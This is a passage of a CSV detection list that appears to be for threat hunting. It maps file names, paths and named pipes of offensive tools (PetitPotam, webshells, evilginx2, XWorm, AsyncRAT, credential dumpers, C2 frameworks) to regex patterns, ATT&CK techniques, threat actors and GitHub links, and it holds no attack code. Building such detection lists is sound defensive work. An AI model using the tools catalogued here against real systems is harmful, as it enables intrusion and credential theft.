"*\persit_windows.go*",".{0,1000}\\persit_windows\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","17217" "*\petit\pipe\srvsvc*",".{0,1000}\\petit\\pipe\\srvsvc.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#namedpipe","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17218" "*\PetitPotam.exe*",".{0,1000}\\PetitPotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other 
functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","17219" "*\petitpotam.py*",".{0,1000}\\petitpotam\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17220" "*\PetitPotato.cpp*",".{0,1000}\\PetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17221" "*\PetitPotato.log*",".{0,1000}\\PetitPotato\.log.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17222" "*\petitpotato.obj*",".{0,1000}\\petitpotato\.obj.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17223" "*\petitpotato.pdb*",".{0,1000}\\petitpotato\.pdb.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam 
(Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17224" "*\PetitPotato.sln*",".{0,1000}\\PetitPotato\.sln.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17225" "*\PetitPotato.tlog*",".{0,1000}\\PetitPotato\.tlog.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17226" "*\PetitPotato.vcxproj*",".{0,1000}\\PetitPotato\.vcxproj.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17227" "*\petitpotato\x64\*",".{0,1000}\\petitpotato\\x64\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17228" "*\PetitPotato-1.0.0.zip*",".{0,1000}\\PetitPotato\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate 
privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17229" "*\PetitPotato-1.0.0\*",".{0,1000}\\PetitPotato\-1\.0\.0\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17230" "*\PEzor.cpp*",".{0,1000}\\PEzor\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","17231" "*\PEzor.hpp*",".{0,1000}\\PEzor\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","17232" "*\PEzor\loader.c*",".{0,1000}\\PEzor\\loader\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","17233" "*\PhishCreds.ps1*",".{0,1000}\\PhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 
- T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17239" "*\phishery.exe*",".{0,1000}\\phishery\.exe.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","17240" "*\phishlets\example.yaml*",".{0,1000}\\phishlets\\example\.yaml.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","17241" "*\php_custom_spy_for_mysql.php*",".{0,1000}\\php_custom_spy_for_mysql\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17242" "*\php_webshell.py*",".{0,1000}\\php_webshell\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - 
TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17243" "*\php-backdoor.php*",".{0,1000}\\php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","N/A","10","","N/A","","","","17244" "*\php-backdoor.php*",".{0,1000}\\php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17245" "*\phpkit.py*",".{0,1000}\\phpkit\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17246" "*\phpkitcli.py*",".{0,1000}\\phpkitcli\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17247" "*\PHPRemoteView.php*",".{0,1000}\\PHPRemoteView\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17248" 
"*\phpshell.php*",".{0,1000}\\phpshell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17249" "*\phpsploit-main*",".{0,1000}\\phpsploit\-main.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","17250" "*\PHPSPY.php*",".{0,1000}\\PHPSPY\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17251" "*\PHVNC.exe*",".{0,1000}\\PHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17252" "*\PHVNC.pdb*",".{0,1000}\\PHVNC\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - 
TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17253" "*\physmem2minidump.py*",".{0,1000}\\physmem2minidump\.py.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","17254" "*\physmem2profit-master*",".{0,1000}\\physmem2profit\-master.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","17255" "*\PickleC2\Core\*.py*",".{0,1000}\\PickleC2\\Core\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","17256" "*\PILOT.ps1*",".{0,1000}\\PILOT\.ps1.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","17258" "*\PILOT\ATC.py*",".{0,1000}\\PILOT\\ATC\.py.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using 
ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","17259" "*\PingRAT\*",".{0,1000}\\PingRAT\\.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","0","N/A","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","17262" "*\PingSweep.ps1*",".{0,1000}\\PingSweep\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17263" "*\PInject.ps1*",".{0,1000}\\PInject\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","17264" "*\pipe\$77control*",".{0,1000}\\pipe\\\$77control.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 
- T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17265" "*\pipe\\cachedumppipe*",".{0,1000}\\pipe\\\\cachedumppipe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#namedpipe","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","17266" "*\pipe\brutepipe*",".{0,1000}\\pipe\\brutepipe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","17267" "*\pipe\cachedumppipe*",".{0,1000}\\pipe\\cachedumppipe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#namedpipe","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","17268" "*\pipe\ElevationPipe*",".{0,1000}\\pipe\\ElevationPipe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun 
service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#namedpipe","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","17270" "*\pipe\GodPotato*",".{0,1000}\\pipe\\GodPotato.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#namedpipe","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","17271" "*\pipe\gsecdump_*",".{0,1000}\\pipe\\gsecdump_.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","17272" "*\pipe\MIMIKATZ*",".{0,1000}\\pipe\\MIMIKATZ.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#namedpipe","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","17273" "*\pipe\moj_ML_ntsvcs *",".{0,1000}\\pipe\\moj_ML_ntsvcs\s.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#namedpipe","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","17274" "*\pipe\RustPotato*",".{0,1000}\\pipe\\RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content #namedpipe","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","17279" "*\pipe\SigmaPotato*",".{0,1000}\\pipe\\SigmaPotato.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#namedpipe","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","17280" 
"*\pipe\WCEServicePipe*",".{0,1000}\\pipe\\WCEServicePipe.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#namedpipe","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","17281" "*\PipeViewer.exe*",".{0,1000}\\PipeViewer\.exe.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","17282" "*\PipeViewer.sln*",".{0,1000}\\PipeViewer\.sln.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","17283" "*\PipeViewer\Program.cs*",".{0,1000}\\PipeViewer\\Program\.cs.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","17284" "*\pkg\merlin.go*",".{0,1000}\\pkg\\merlin\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17285" "*\Plasma RAT.exe*",".{0,1000}\\Plasma\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17286" "*\Plasma RAT.exe*",".{0,1000}\\Plasma\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17287" "*\Plugins\HRDP.dll*",".{0,1000}\\Plugins\\HRDP\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17288" "*\Plugins\HVNC.dll*",".{0,1000}\\Plugins\\HVNC\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - 
TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17289" "*\Plugins\PreventSleep.dll*",".{0,1000}\\Plugins\\PreventSleep\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17290" "*\Plugins\RemoteCamera.dll*",".{0,1000}\\Plugins\\RemoteCamera\.dll.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","17291" "*\Plugins\RemoteDesktop.dll*",".{0,1000}\\Plugins\\RemoteDesktop\.dll.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","17292" "*\Plugins\Resources\WindowsFormsApp1.exe*",".{0,1000}\\Plugins\\Resources\\WindowsFormsApp1\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - 
